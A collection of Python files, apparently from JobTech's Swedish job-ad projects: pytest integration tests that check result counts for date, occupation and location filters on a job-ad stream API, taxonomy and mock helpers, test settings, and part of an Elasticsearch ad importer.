('2020-12-15T00:00:01', work.larare_i_fritidshem_fritidspedagog, geo.vastra_gotalands_lan, 1),
('2020-12-01T00:00:01', work.servitor_servitris__kafe_och_konditori, geo.sverige, 0),
('2020-12-01T00:00:01', work.bussforare_busschauffor, geo.sverige, 2),
('2020-12-01T00:00:01', work.larare_i_grundskolan__arskurs_7_9, geo.stockholms_lan, 3),
(DAWN_OF_TIME, group.grundutbildade_sjukskoterskor, geo.sverige, 104),
(DAWN_OF_TIME, group.mjukvaru__och_systemutvecklare_m_fl_, geo.sverige, 88),
(DAWN_OF_TIME, group.mjukvaru__och_systemutvecklare_m_fl_, geo.schweiz, 0),
('2020-11-01T00:00:01', group.mjukvaru__och_systemutvecklare_m_fl_, geo.sverige, 81),
('2020-12-01T00:00:01', field.militart_arbete, geo.schweiz, 0),
(DAWN_OF_TIME, field.militart_arbete, geo.sverige, 6),
(DAWN_OF_TIME, field.halso__och_sjukvard, geo.sverige, 269),
(DAWN_OF_TIME, field.halso__och_sjukvard, geo.stockholms_lan, 55),
('2020-11-25T00:00:01', field.halso__och_sjukvard, geo.sverige, 220),
('2020-12-15T00:00:01', field.halso__och_sjukvard, geo.stockholms_lan, 18),
])
def test_filter_with_date_and_occupation_and_location(session_stream, date, work, geo,
expected_number_of_hits):
"""
should return results based on date AND occupation type AND location
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: work, LOCATION_CONCEPT_ID: geo}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, concept_id, expected_number_of_hits', [
(DAWN_OF_TIME, work.personlig_assistent, 48),
('2020-11-01T00:00:01', work.personlig_assistent, 42),
('2020-12-01T00:00:01', work.personlig_assistent, 30),
('2020-12-15T00:00:01', work.personlig_assistent, 9),
('2021-01-01T00:00:01', work.personlig_assistent, 0),
(DAWN_OF_TIME, work.kassapersonal, 3),
('2020-12-01T00:00:01', work.kassapersonal, 2),
(DAWN_OF_TIME, work.mjukvaruutvecklare, 20),
('2020-10-25T00:00:00', work.mjukvaruutvecklare, 18),
('2020-11-25T00:00:00', work.mjukvaruutvecklare, 14),
('2020-12-15T00:00:00', work.mjukvaruutvecklare, 6),
(DAWN_OF_TIME, group.arbetsformedlare, 7),
('2020-03-25T00:00:00', group.arbetsformedlare, 7),
(DAWN_OF_TIME, field.militart_arbete, 6),
(DAWN_OF_TIME, field.socialt_arbete, 111),
(DAWN_OF_TIME, work.administrativ_chef, 4),
(DAWN_OF_TIME, work.account_manager, 13),
(DAWN_OF_TIME, work.cykelbud, 1),
])
def test_filter_with_date_and_one_occupation(session_stream, date, concept_id, expected_number_of_hits):
"""
test of filtering in /stream: should return results based on date AND occupation-related concept_id
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: concept_id}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, geo, expected_number_of_hits', [
(DAWN_OF_TIME, geo.falun, 9),
(DAWN_OF_TIME, geo.stockholms_lan, 410),
('2020-12-01T00:00:01', geo.stockholms_lan, 297),
('2020-12-05T00:00:01', geo.stockholms_lan, 263),
(DAWN_OF_TIME, geo.norge, 4),
('2020-11-01T00:00:01', geo.hallands_lan, 36),
('2020-11-01T00:00:01', geo.linkoping, 31),
(DAWN_OF_TIME, geo.sverige, 1485),
('2020-11-01T00:00:01', geo.sverige, 1387),
('2020-12-15T00:00:01', geo.sverige, 551),
('2020-12-01T00:00:01', geo.stockholm, 202),
('2020-12-01T00:00:01', geo.schweiz, 1),
('2020-12-01T00:00:01', geo.norge, 4),
('2020-11-01T00:00:01', geo.dalarnas_lan, 30),
('2020-12-01T00:00:01', geo.dalarnas_lan, 26),
('2020-12-15T00:00:01', geo.dalarnas_lan, 12)])
def test_filter_with_date_and_location(session_stream, date, geo, expected_number_of_hits):
"""
should return results based on date AND occupation type AND location_1
"""
params = {'date': date, LOCATION_CONCEPT_ID: geo}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
# multiple params of same type
@pytest.mark.parametrize('date, work_1, work_2, expected_number_of_hits', [
(DAWN_OF_TIME, work.account_manager, work.cykelbud, 14),
(DAWN_OF_TIME, work.mjukvaruutvecklare, group.arbetsformedlare, 27),
(DAWN_OF_TIME, work.cykelbud, work.account_manager, 14),
('2020-11-01T00:00:01', work.mjukvaruutvecklare, group.arbetsformedlare, 25),
('2020-12-01T00:00:01', work.mjukvaruutvecklare, group.arbetsformedlare, 17),
(DAWN_OF_TIME, work.administrativ_chef, field.militart_arbete, 10),
(DAWN_OF_TIME, field.militart_arbete, work.administrativ_chef, 10),
('2020-11-01T00:00:01', group.bagare_och_konditorer, group.bartendrar, 2),
(DAWN_OF_TIME, group.bagare_och_konditorer, group.bartendrar, 3),
('2020-11-11T00:00:01', group.apotekare, field.data_it, 129),
('2020-12-12T00:00:01', group.apotekare, field.data_it, 66),
('2020-11-25T00:00:00', group.frisorer, work.akupunktor, 2),
('2020-11-25T00:00:00', field.pedagogiskt_arbete, field.halso__och_sjukvard, 338),
('2020-12-15T00:00:00', field.hantverksyrken, group.hudterapeuter, 3),
('2020-11-25T00:00:00', field.socialt_arbete, work.databasutvecklare, 92)])
def test_filter_with_date_and_two_occupations(session_stream, date, work_1, work_2,
expected_number_of_hits):
"""
test of filtering in /stream with date and 2 occupation-related concept_ids
should return results based on both date AND (work_1 OR work_2)
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: [work_1, work_2]}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work_1, work_2, work_3, expected_number_of_hits', [
(DAWN_OF_TIME, work.account_manager, work.cykelbud, work.databasutvecklare, 15),
('2020-11-01T00:00:01', work.mjukvaruutvecklare, work.databasutvecklare, group.arbetsformedlare, 26),
('2020-12-01T00:00:01', work.administrativ_chef, work.apotekschef, field.militart_arbete, 10),
('2020-11-01T00:00:01', group.bagare_och_konditorer, group.bartendrar, group.hovmastare_och_servitorer, 4),
('2020-12-01T00:00:01', group.apotekare, group.ambulanssjukskoterskor_m_fl_, field.data_it, 108),
('2020-11-25T00:00:00', group.frisorer, group.hudterapeuter, work.akupunktor, 2),
(DAWN_OF_TIME, field.pedagogiskt_arbete, field.halso__och_sjukvard, field.kropps__och_skonhetsvard, 416),
('2020-11-25T00:00:00', field.pedagogiskt_arbete, field.halso__och_sjukvard, field.kropps__och_skonhetsvard, 342),
(DAWN_OF_TIME, field.hantverksyrken, field.data_it, group.hudterapeuter, 162),
('2020-11-25T00:00:00', field.hantverksyrken, field.data_it, group.hudterapeuter, 122),
(DAWN_OF_TIME, field.socialt_arbete, field.bygg_och_anlaggning, work.databasutvecklare, 184),
('2020-11-25T00:00:00', field.socialt_arbete, field.bygg_och_anlaggning, work.databasutvecklare, 153)
])
def test_filter_with_date_and_three_occupations(session_stream, date, work_1, work_2, work_3,
expected_number_of_hits):
"""
test of filtering in /stream with date and 2 occupation-related concept_ids
should return results based on date AND (work_1 OR work_2 OR work 3)
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: [work_1, work_2, work_3]}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params=params)
@pytest.mark.smoke
@pytest.mark.parametrize('date, work_1, work_2, geo_1, expected_number_of_hits', [
(DAWN_OF_TIME, work.arbetsterapeut, work.bussforare_busschauffor, geo.sverige, 5),
(DAWN_OF_TIME, work.arbetsterapeut, group.apotekare, geo.vastra_gotalands_lan, 0),
(DAWN_OF_TIME, work.arbetsterapeut, field.kropps__och_skonhetsvard, geo.norge, 0),
(DAWN_OF_TIME, work.arbetsterapeut, field.kropps__och_skonhetsvard, geo.sverige, 11),
(DAWN_OF_TIME, group.grundutbildade_sjukskoterskor, group.grundutbildade_sjukskoterskor, geo.sverige, 104),
(DAWN_OF_TIME, group.apotekare, group.hovmastare_och_servitorer, geo.stockholms_lan, 1),
(DAWN_OF_TIME, group.apotekare, group.arbetsformedlare, geo.sverige, 7),
('2020-12-01T00:00:01', field.militart_arbete, field.hantverksyrken, geo.stockholm, 2),
('2020-12-01T00:00:01', field.militart_arbete, group.ambulanssjukskoterskor_m_fl_, geo.sverige, 8),
('2020-12-01T00:00:01', field.militart_arbete, work.bussforare_busschauffor, geo.norge, 0)])
def test_filter_with_date_and_two_occupations_and_location(session_stream, date, work_1, work_2, geo_1,
expected_number_of_hits):
"""
should return results based on date AND location AND (work_1 OR work_2)
results = work_1 + work_2 that matches location
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: [work_1, work_2], LOCATION_CONCEPT_ID: geo_1}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, geo_1, geo_2, expected_number_of_hits', [
(DAWN_OF_TIME, geo.arboga, geo.falun, 11),
(DAWN_OF_TIME, geo.arboga, geo.stockholms_lan, 412),
(DAWN_OF_TIME, geo.arboga, geo.norge, 6),
('2020-11-01T00:00:01', geo.dalarnas_lan, geo.hallands_lan, 66),
('2020-11-01T00:00:01', geo.dalarnas_lan, geo.linkoping, 61),
('2020-11-01T00:00:01', geo.dalarnas_lan, geo.sverige, 1387),
('2020-12-01T00:00:01', geo.schweiz, geo.stockholm, 203),
('2020-12-01T00:00:01', geo.schweiz, geo.jonkopings_lan, 39),
('2020-12-01T00:00:01', geo.schweiz, geo.norge, 5),
('2020-11-01T00:00:01', geo.dalarnas_lan, geo.schweiz, 31),
('2020-12-01T00:00:01', geo.schweiz, geo.norge, 5)])
def test_filter_with_date_and_two_locations(session_stream, date, geo_1, geo_2, expected_number_of_hits):
"""
should return results based on date AND occupation type AND (location_1 OR location_2)
"""
params = {'date': date, LOCATION_CONCEPT_ID: [geo_1, geo_2]}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, geo_list, expected_number_of_hits', [
(DAWN_OF_TIME, [geo.stockholms_lan], 410),
(DAWN_OF_TIME, [geo.stockholms_lan, geo.solna], 410),
(DAWN_OF_TIME, [geo.stockholms_lan, geo.stockholm, geo.botkyrka], 410),
(DAWN_OF_TIME, [geo.stockholms_lan, geo.stockholm, geo.botkyrka, geo.solna, geo.nacka], 410)])
def test_filter_with_date_and_multiple_locations_in_same_region(session_stream, date, geo_list,
expected_number_of_hits):
"""
should return results based on date AND occupation type AND (location_1 OR location_2)
"""
params = {'date': date, LOCATION_CONCEPT_ID: geo_list}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work_list, expected_number_of_hits', [
(DAWN_OF_TIME, [field.halso__och_sjukvard], 270),
(DAWN_OF_TIME, [field.halso__och_sjukvard, work.sjukskoterska__grundutbildad], 270),
(DAWN_OF_TIME, [field.halso__och_sjukvard, group.grundutbildade_sjukskoterskor], 270),
(DAWN_OF_TIME,
[field.halso__och_sjukvard, group.grundutbildade_sjukskoterskor, group.ambulanssjukskoterskor_m_fl_,
work.sjukskoterska__medicin_och_kirurgi], 270)])
def test_filter_with_date_and_multiple_occupations_within_same_field(session_stream, date, work_list,
expected_number_of_hits):
"""
should return results based on date AND occupation type AND (location_1 OR location_2)
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: work_list}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work_list, expected_number_of_hits', [
(DAWN_OF_TIME, [field.halso__och_sjukvard], 270),
(DAWN_OF_TIME, [group.grundutbildade_sjukskoterskor], 105),
(DAWN_OF_TIME, [work.sjukskoterska__grundutbildad], 103)
])
def test_filter_narrowing_down_occupations_within_same_field(session_stream, date, work_list,
expected_number_of_hits):
"""
should return results based on date AND occupation type AND (location_1 OR location_2)
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: work_list}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work, geo_1, geo_2, expected_number_of_hits', [
(DAWN_OF_TIME, work.arbetsterapeut, geo.arboga, geo.falun, 0),
(DAWN_OF_TIME, work.arbetsterapeut, geo.vastra_gotalands_lan, geo.ostergotlands_lan, 0),
(DAWN_OF_TIME, group.civilingenjorsyrken_inom_bygg_och_anlaggning, geo.dalarnas_lan, geo.hallands_lan, 0),
(DAWN_OF_TIME, group.civilingenjorsyrken_inom_bygg_och_anlaggning, geo.dalarnas_lan, geo.linkoping, 0),
(DAWN_OF_TIME, group.civilingenjorsyrken_inom_bygg_och_anlaggning, geo.malta, geo.sverige, 12),
('2020-12-01T00:00:01', field.kultur__media__design, geo.schweiz, geo.stockholm, 5),
('2020-12-01T00:00:01', field.naturvetenskapligt_arbete, geo.schweiz, geo.stockholms_lan, 4),
('2020-12-01T00:00:01', field.bygg_och_anlaggning, geo.schweiz, geo.norge, 1),
(DAWN_OF_TIME, group.mjukvaru__och_systemutvecklare_m_fl_, geo.vastra_gotalands_lan, geo.schweiz, 16),
('2020-02-01T00:00:01', work.bussforare_busschauffor, geo.schweiz, geo.norge,0)])
def test_filter_with_date_and_occupation_and_two_locations(session_stream, date, work, geo_1, geo_2,
expected_number_of_hits):
"""
should return results based on date AND occupation type AND (location_1 OR location_2)
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: work, LOCATION_CONCEPT_ID: [geo_1, geo_2]}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
@pytest.mark.parametrize('date, work_1, work_2, geo_1, geo_2, expected_number_of_hits', [
(DAWN_OF_TIME, work.databasutvecklare, work.arbetsterapeut, geo.goteborg, geo.falun, 0),
(DAWN_OF_TIME, work.databasutvecklare, work.sjukskoterska__grundutbildad, geo.arboga, geo.falun, 4),
(DAWN_OF_TIME, group.mjukvaru__och_systemutvecklare_m_fl_, work.arbetsterapeut, geo.arboga, geo.stockholms_lan, 37),
(DAWN_OF_TIME, work.farmaceut_apotekare, group.kassapersonal_m_fl_, geo.dalarnas_lan, geo.hallands_lan, 0),
(DAWN_OF_TIME, work.sjukskoterska__grundutbildad, group.apotekare, geo.dalarnas_lan, geo.linkoping,6),
(DAWN_OF_TIME, work.barnsjukskoterska, group.apotekare, geo.malta, geo.sverige, 1),
('2020-12-01T00:00:01', work.eltekniker, field.kultur__media__design, geo.schweiz, geo.stockholm, 5),
('2020-12-01T00:00:01', work.butikssaljare__fackhandel, field.naturvetenskapligt_arbete, geo.schweiz,
geo.stockholms_lan, 8),
('2020-12-01T00:00:01', group.gymnasielarare, field.bygg_och_anlaggning, geo.schweiz, geo.norge, 1),
('2020-12-01T00:00:01', group.grundutbildade_sjukskoterskor, field.bygg_och_anlaggning, geo.schweiz, geo.norge, 2),
('2020-12-01T00:00:01', group.grundutbildade_sjukskoterskor, field.halso__och_sjukvard, geo.schweiz, geo.norge, 1),
(DAWN_OF_TIME, work.bygg__och_anlaggningsforare, group.mjukvaru__och_systemutvecklare_m_fl_, geo.dalarnas_lan,
geo.schweiz, 0),
('2020-12-01T00:00:01', field.halso__och_sjukvard, work.bussforare_busschauffor, geo.schweiz, geo.norge, 1)])
def test_filter_with_date_and_two_occupations_and_two_locations(session_stream, date, work_1, work_2, geo_1,
geo_2,
expected_number_of_hits):
"""
should return results based on date AND (occupation 1 OR occupation 2) AND (location_1 OR location_2)
"""
params = {'date': date, OCCUPATION_CONCEPT_ID: [work_1, work_2], LOCATION_CONCEPT_ID: [geo_1, geo_2]}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
# test below for comparison of number of hits for different dates
@pytest.mark.parametrize('date, expected_number_of_hits', [
(DAWN_OF_TIME, NUMBER_OF_ADS),
('2020-10-01T00:00:01', 1439),
('2020-11-01T00:00:01', 1397),
('2020-11-25T00:00:00', 1249),
('2020-12-01T00:00:00', 1146),
('2020-12-05T00:00:00', 985),
('2020-12-10T00:00:00', 778),
('2020-12-15T00:00:00', 554),
('2020-12-20T00:00:00', 168),
('2020-12-21T00:00:00', 161),
('2020-12-22T00:00:00', 28),
('2020-12-22T12:00:00', 6),
('2020-12-22T12:30:40', 1),
('2020-12-23T00:00:00', 0),
])
def test_filter_only_on_date(session_stream, date, expected_number_of_hits):
"""
Test basic stream with filtering on date (update after this date)
"""
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params={'date': date})
@pytest.mark.parametrize('from_date, to_date, expected_number_of_hits', [
# 1 verify that results are the same as when only using a single date
(DAWN_OF_TIME, current_time_stamp, NUMBER_OF_ADS),
('2020-10-01T00:00:01', '2021-04-30T00:00:00', 1439),
('2020-11-01T00:00:01', '2021-04-30T00:00:00', 1397),
('2020-11-15T00:00:00', '2021-04-30T00:00:00', 1339),
('2020-11-20T00:00:00', '2021-04-30T00:00:00', 1301),
('2020-11-30T00:00:00', '2021-04-30T00:00:00', 1171),
('2020-12-05T00:00:00', '2021-04-30T00:00:00', 985),
('2020-12-10T00:00:00', '2021-04-30T00:00:00', 778),
('2020-12-15T00:00:00', '2021-04-30T00:00:00', 554),
('2020-12-20T00:00:00', '2021-04-30T00:00:00', 168),
('2020-12-30T08:29:41', '2021-04-30T00:00:00', 0),
('2020-11-25T00:00:00', '2021-11-25T00:00:00', 1249),
('2020-12-14T00:00:00', '2021-03-30T00:00:00', 649),
('2020-12-14T00:00:00', '2020-12-16T00:00:00', 176),
('2020-11-14T00:00:00', '2020-11-20T00:00:00',39),
('2020-11-25T00:00:00', '2020-11-30T00:00:00', 78),
('2020-11-26T00:00:00', '2020-11-30T00:00:00', 52),
('2020-12-10T00:00:00', '2020-12-15T00:00:00', 224),
('2020-12-12T00:00:00', '2020-12-15T00:00:00', 103),
('2020-12-15T00:00:00', '2020-12-16T00:00:00', 81),
('2020-12-16T00:00:00', '2020-12-17T10:00:00', 101),
('2020-12-22T00:00:00', '2020-12-23T10:00:00', 28),
(DAWN_OF_TIME, '2021-04-30T10:00:00', NUMBER_OF_ADS),
(DAWN_OF_TIME, current_time_stamp, NUMBER_OF_ADS),
# reverse order should return 0 results without errors
(current_time_stamp, DAWN_OF_TIME, 0)
])
def test_filter_on_date_interval(session_stream, from_date, to_date, expected_number_of_hits):
"""
Test stream with filtering on date interval.
"""
params = {'date': from_date, UPDATED_BEFORE_DATE: to_date}
get_stream_check_number_of_results(session_stream, expected_number_of_hits, params)
```
#### File: integration_tests/search/test_taxonomy.py
```python
import logging
import pytest
from sokannonser.repository import taxonomy as t
from sokannonser.repository import platsannonser
import re
log = logging.getLogger(__name__)
tax_stat = [[t.OCCUPATION], [t.GROUP], [t.FIELD], [t.SKILL]]
tax_other = [[t.MUNICIPALITY], [t.REGION]]
tax_noexist = [[' ', 'blabla', '']]
@pytest.mark.parametrize("taxonomy_type", tax_stat + tax_other + tax_noexist)
def test_get_stats_for_taxonomy_type(taxonomy_type):
if taxonomy_type not in tax_stat:
try:
platsannonser.get_stats_for(taxonomy_type)
except KeyError as e:
print('KeyError exception. Reason: taxonomy type %s' % str(e))
assert "'" + taxonomy_type + "'" == str(e)
except Exception as ex:
pytest.fail('ERROR: This is not a KeyError exception: %s (%s)' %
(str(ex), taxonomy_type), pytrace=False)
else: # taxonomy_type is in 5 mentioned in platsannonser.py::get_stats_for()
for k, v in platsannonser.get_stats_for(taxonomy_type).items():
assert (re.match(r'^[\w\d_-]*$', k) is not None) # check k is string of int
assert isinstance(v, int) # check v is int
@pytest.mark.parametrize("taxonomy_type", (tax_noexist))
def test_get_stats_for_taxonomy_type_neg(taxonomy_type):
assert platsannonser.get_stats_for(taxonomy_type) == {}
@pytest.mark.parametrize("taxonomy_type", tax_other)
def test_get_stats_for_taxonomy_type_other(taxonomy_type):
assert platsannonser.get_stats_for(taxonomy_type) != {}
@pytest.mark.parametrize("v", ['a', 'abc', '-1'])
def test_is_char_as_str(v):
with pytest.raises(AssertionError):
is_int(v)
@pytest.mark.parametrize("v", ['1', '0', '10000'])
def test_is_int_as_str(v):
is_int(v)
@pytest.mark.parametrize("v", [0, 1, 1000])
def test_is_int_as_int(v):
with pytest.raises(TypeError):
is_int(v)
def is_int(value):
assert (re.match(r'[0-9]+$', value) is not None)
```
#### File: integration_tests/test_resources/mock_for_querybuilder_tests.py
```python
import logging
import pytest
import sys
from dateutil import parser
from sokannonser import settings
from sokannonser.repository.querybuilder import QueryBuilder
from sokannonser.repository import taxonomy
log = logging.getLogger(__name__)
class MockOntology:
def __init__(self):
self.extracted_locations = set()
class MockTextToConcept:
def __init__(self):
self.ontology = MockOntology()
def text_to_concepts(self, text):
skills = {
"python": {
"term": "python",
"uuid": "0b6d3a08-3cc3-546d-b8ed-f2de299bafdb",
"concept": "Python",
"type": "KOMPETENS",
"term_uuid": "f60fa7fd-00f7-5803-acd7-1a3eda170397",
"term_misspelled": False,
"plural_occupation": False,
"definite_occupation": False,
"version": "SYNONYM-DIC-2.0.1.25",
"operator": ""
},
"java": {
"term": "java",
"uuid": "c965e8aa-751a-5923-97bd-b8bd6d5e813a",
"concept": "Java",
"type": "KOMPETENS",
"term_uuid": "e3d2a75a-5717-56d2-ad8a-ee4b5baf8530",
"term_misspelled": False,
"plural_occupation": False,
"definite_occupation": False,
"version": "SYNONYM-DIC-2.0.1.25",
"operator": "+"
},
"php": {
"term": "php",
"uuid": "3e3629d1-95f6-5b0e-8f5c-d6a709fd94e2",
"concept": "Php",
"type": "KOMPETENS",
"term_uuid": "216af07e-d210-572f-8885-b13d79b80acc",
"term_misspelled": False,
"plural_occupation": False,
"definite_occupation": False,
"version": "SYNONYM-DIC-2.0.1.25",
"operator": "-"
}
}
occupations = {
"systemutvecklare": {
"term": "systemutvecklare",
"uuid": "df9e7a73-2cc3-5b32-a84e-7e68a527e80e",
"concept": "Systemutvecklare",
"type": "YRKE",
"term_uuid": "7296755c-acf2-5eed-9d4b-e4cd845cd05a",
"term_misspelled": False,
"plural_occupation": False,
"definite_occupation": False,
"version": "SYNONYM-DIC-2.0.1.25",
"operator": ""
}
}
response = {
"skill": [],
"occupation": [],
"trait": [],
"location": [],
"skill_must": [],
"occupation_must": [],
"trait_must": [],
"location_must": [],
"skill_must_not": [],
"occupation_must_not": [],
"trait_must_not": [],
"location_must_not": []
}
for word in text.split():
if word.startswith("+"):
word = word[1:]
if word in skills:
response['skill_must'].append(skills[word])
if word in occupations:
response['occupation_must'].append(occupations[word])
elif word.startswith("-"):
word = word[1:]
if word in skills:
response['skill_must_not'].append(skills[word])
if word in occupations:
response['occupation_must_not'].append(occupations[word])
else:
if word in skills:
response['skill'].append(skills[word])
if word in occupations:
response['occupation'].append(occupations[word])
return response
```
#### File: tests/test_resources/settings.py
```python
import datetime
import os
import json
# environment variables must be set
TEST_USE_STATIC_DATA = os.getenv('TEST_USE_STATIC_DATA', True)
test_api_key_search = os.getenv('TEST_API_KEY_SEARCH')
test_api_key_stream = os.getenv('TEST_API_KEY_STREAM')
NUMBER_OF_ADS = 1495
DAWN_OF_TIME = '1971-01-01T00:00:01'
current_time_stamp = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%S")
headers_search = {'api-key': test_api_key_search, 'accept': 'application/json'}
headers_stream = {'api-key': test_api_key_stream, 'accept': 'application/json'}
test_url_search = os.getenv('TEST_URL_SEARCH', 'http://localhost')
test_port_search = os.getenv('TEST_PORT_SEARCH', 5000)
test_url_stream = os.getenv('TEST_URL_SEARCH', 'http://localhost')
test_port_stream = os.getenv('TEST_PORT_SEARCH', 5000)
SEARCH_URL = f"{test_url_search}:{test_port_search}"
STREAM_URL = f"{test_url_stream}:{test_port_stream}"
REMOTE_MATCH_PHRASES = [y.lower() for y in ["Arbeta på distans", "Arbete på distans", "Jobba på distans", "Arbeta hemifrån",
"Arbetar hemifrån", "Jobba hemifrån", "Jobb hemifrån", "remote work", "jobba tryggt hemifrån"]]
REMOTE_PHRASES_FOR_SWAGGER = json.dumps(REMOTE_MATCH_PHRASES, ensure_ascii=False)
def format_remote_phrases_for_swagger():
swagger_str = ''
for p in REMOTE_MATCH_PHRASES:
swagger_str += f'"{p}", '
return swagger_str.rstrip(', ')
``` |
{
"source": "JobtechSwe/elastic-importers",
"score": 3
} |
#### File: importers/common/keywords_extracted.py
```python
import logging
import re
log = logging.getLogger(__name__)
def add_keywords_extracted(annons):
if 'keywords' not in annons:
annons['keywords'] = {'extracted': {}}
for key_dict in [
{
'occupation': [
'occupation.label',
'occupation_group.label',
'occupation_field.label',
]
},
{
'skill': [
'must_have.skills.label',
'must_have.languages.label',
'nice_to_have.skills.label',
'nice_to_have.languages.label',
]
},
{
'location': [
'workplace_address.city',
'workplace_address.municipality',
'workplace_address.region',
'workplace_address.country',
]
},
{
'employer': [
'employer.name',
'employer.workplace'
]
}
]:
field = list(key_dict.keys())[0]
keywords = set()
values = []
for key in list(key_dict.values())[0]:
values += _get_nested_value(key, annons)
if field == 'employer':
for value in _create_employer_name_keywords(values):
keywords.add(value)
elif field == 'location':
for value in values:
trimmed = _trim_location(value)
if trimmed:
keywords.add(trimmed)
else:
for value in values:
for kw in _extract_taxonomy_label(value):
keywords.add(kw)
annons['keywords']['extracted'][field] = list(keywords)
return annons
def _create_employer_name_keywords(companynames):
names = []
for companyname in companynames or []:
converted_name = companyname.lower().strip()
converted_name = __right_replace(converted_name, ' ab', '')
converted_name = __left_replace(converted_name, 'ab ', '')
names.append(converted_name)
if names:
names.sort(key=lambda s: len(s))
shortest = len(names[0])
uniques = [names[0]]
for i in range(1, len(names)):
if names[i][0:shortest] != names[0] and names[i]:
uniques.append(names[i])
return uniques
return []
def __right_replace(astring, pattern, sub):
return sub.join(astring.rsplit(pattern, 1))
def __left_replace(astring, pattern, sub):
return sub.join(astring.split(pattern, 1))
def _trim_location(locationstring):
# Look for unwanted words (see tests/unit/test_converter.py)
pattern = '[0-9\\-]+|.+,|([\\d\\w]+\\-[\\d]+)|\\(.*|.*\\)|\\(\\)|\\w*\\d+\\w*'
regex = re.compile(pattern)
stopwords = ['box']
if locationstring:
# Magic regex
valid_words = []
for word in locationstring.lower().split():
if word and not re.match(regex, word) and word not in stopwords:
valid_words.append(word)
return ' '.join(valid_words)
return locationstring
def _get_nested_value(path, data):
key_path = path.split('.')
values = []
for i in range(len(key_path)):
element = data.get(key_path[i])
if isinstance(element, str):
values.append(element)
break
if isinstance(element, list):
for item in element:
if item:
values.append(item.get(key_path[i + 1]))
break
if isinstance(element, dict):
data = element
return values
def _extract_taxonomy_label(label):
if not label:
return []
try:
label = label.replace('m.fl.', '').strip()
if '-' in label:
return [word.lower() for word in re.split(r'/', label)]
else:
return [word.lower().strip() for word in re.split(r'/|, | och ', label)]
except AttributeError:
log.warning(f'(extract_taxonomy_label) extract fail for: {label}')
return []
```
#### File: importers/platsannons/main.py
```python
import time
import logging
import sys
import math
from datetime import datetime
from jobtech.common.customlogging import configure_logging
import importers.mappings
from importers import settings
from importers.platsannons import loader, converter
from importers.common import elastic, enricher
from importers.indexmaint.main import set_platsannons_read_alias, set_platsannons_write_alias, \
check_index_size_before_switching_alias
from importers.common.helpers import grouper
configure_logging([__name__.split('.')[0], 'importers'])
log = logging.getLogger(__name__)
enriched_ads_to_save = []
def _setup_index(es_index):
if len(sys.argv) > 1:
es_index = sys.argv[1]
try:
es_index, delete_index = elastic.setup_indices(es_index,
settings.ES_ANNONS_PREFIX,
importers.mappings.platsannons_mappings,
importers.mappings.platsannons_deleted_mappings)
log.info(f'Starting importer with batch: {settings.PG_BATCH_SIZE} for index: {es_index}')
log.info(f'Index for removed items: {delete_index}')
except Exception as e:
log.error(f"Elastic operations failed. Exit! {e}")
sys.exit(1)
return es_index, delete_index
def _check_last_timestamp(es_index):
if not settings.LA_LAST_TIMESTAMP_MANUAL:
last_timestamp = elastic.get_last_timestamp(es_index)
log.info("Index: %s Last timestamp: %d (%s)"
% (es_index, last_timestamp, datetime.fromtimestamp(last_timestamp / 1000)))
else:
last_timestamp = settings.LA_LAST_TIMESTAMP
log.warning("Index: %s Last timestamp set MANUALLY: %d (%s)"
% (es_index, last_timestamp, datetime.fromtimestamp(last_timestamp / 1000)))
return last_timestamp
def start(es_index=None):
start_time = time.time()
if not elastic.get_alias(importers.settings.ES_TAX_INDEX_ALIAS):
log.error(f"no index for: {importers.settings.ES_TAX_INDEX_ALIAS}. Exit!")
sys.exit(1)
if not settings.LA_FEED_URL:
log.error("LA_FEED_URL is not set. Exit!")
sys.exit(1)
# Get, set and create elastic index
es_index, es_index_deleted = _setup_index(es_index)
log.info(f"Starting ad import into index: {es_index}")
log.info(f"Using taxonomy index: {elastic.get_index_name_for_alias(importers.settings.ES_TAX_INDEX_ALIAS)}")
last_timestamp = _check_last_timestamp(es_index)
log.info(f"Timestamp to load from: {last_timestamp}")
# Load list of updated ad ids
ad_ids = loader.load_list_of_updated_ads(last_timestamp)
number_total = len(ad_ids)
number_of_ids_to_load = number_total
# variable to skip endless loop of fetching missing ads:
number_of_ids_missing_fix = -1
while number_of_ids_to_load > 0:
log.info(f'Fetching details for ads: {number_of_ids_to_load}')
_load_and_process_ads(ad_ids, es_index, es_index_deleted)
log.info(f"Verifying that all ads were indexed in: {es_index}")
ad_ids = _find_missing_ids_and_create_loadinglist(ad_ids, es_index)
number_of_ids_to_load = len(ad_ids)
if number_of_ids_missing_fix == number_of_ids_to_load:
log.error(f"Missing ads amount is same as before: {number_of_ids_to_load}")
log.error(f"No more trying to fetch. Check these ads: {ad_ids}")
break
if number_of_ids_to_load > 0:
number_of_ids_missing_fix = number_of_ids_to_load
log.info(f"Missing ads: {ad_ids}")
log.warning(f"Still missing ads: {number_of_ids_to_load}. Trying again...")
else:
log.info("No missing ads to load.")
break
elapsed_time = time.time() - start_time
m, s = divmod(elapsed_time, 60)
log.info("Processed %d docs in: %d minutes %5.2f seconds." % (number_total, m, s))
num_doc_elastic = elastic.document_count(es_index)
if num_doc_elastic:
log.info(f"Index: {es_index} has: {num_doc_elastic} indexed documents.")
if not check_index_size_before_switching_alias(es_index):
